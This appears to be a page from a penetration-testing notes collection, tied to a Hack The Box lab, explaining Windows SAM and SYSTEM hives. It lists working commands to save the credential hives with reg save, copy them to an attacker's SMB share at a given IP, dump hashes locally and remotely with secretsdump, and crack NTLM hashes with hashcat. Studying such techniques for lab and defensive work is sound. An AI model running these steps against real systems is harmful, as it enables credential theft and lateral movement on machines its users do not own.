SAM and SYSTEM files

Cicada HTB

The Security Account Manager (SAM) is a database file in windows that sotres user credentials, including NTLM and sometimes LM hashes of user passwords. These hashes are stored in protected registry hive and are used to authenticate users on the system.

SAM Operation Modes:

  • Online Mode - Requires SYSTEM user or token to access

  • Offline Mode - Requires SYSTEM and SAM registry hives or backup files

Location of SAM files:

%SystemRoot%\System32\config\SAM

It is mounted on HKLM\SAM

Common Locations of SAM and SYSTEM files

%SystemRoot%\repair\SAM
%SystemRoot%\System32\config\RegBack\SAM
%SystemRoot%\System32\config\SAM
%SystemRoot%\repair\system
%SystemRoot%\System32\config\SYSTEM
%SystemRoot%\System32\config\RegBack\SYSTEM

Note: %SystemRoot% is usually C:\Windows.

Extracting Windows Password Hashes

Step 1: Save SAM, SYSTEM and SECURITY Hives

use the reg save command to export the registry hives

mkdir c:\pass
reg save hklm\sam C:\pass\sam
reg save hklm\system C:\pass\system
reg save hklm\security C:\pass\security

Step 2: Transfer Files to Attacker Machine

Start an SMB server using impacket:

python smbserver.py public /home/Public

Alternate:

impacket-smbserver -smb2support -user user -password 12345 share /opt/share

copy the files over the network

copy sam \\192.168.29.218\Public\
copy system \\192.168.29.218\Public\

Alternative:

evil-winrm -u Administrator -p Devnull@123 -i 192.168.29.21

Step 3: Clone and install Impacket

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install .

Step 4: Extract Password Hashes with secretsdump

impacket-secretsdump -sam sam -security security -system system LOCAL

Step 5: Save the NTLM hash to a file

<hash> > hash.txt

Step 6: Crack NTLM Hash with hashcat

hashcat -m 1000 -a 0 hash.txt /usr/share/wordlist/rockyou.txt -o hash.out.txt

Dumping Remote Hashes using secretsdump

impacket-secretsdump <hostname>/<username>:<password>@<target_IP>

you can use the above command without hostname as well

Extracting BootKey from SYSTEM Hive

bkhive system bootkey.txt

Tips and Best Practices

  • Do not change password

  • Only work when you are administrator

  • generally used when you want to go to different machine/account via this.

  • database of non AD user/local PC database

PreviousPassword MiningNextNTDS.DIR Active Directory

Last updated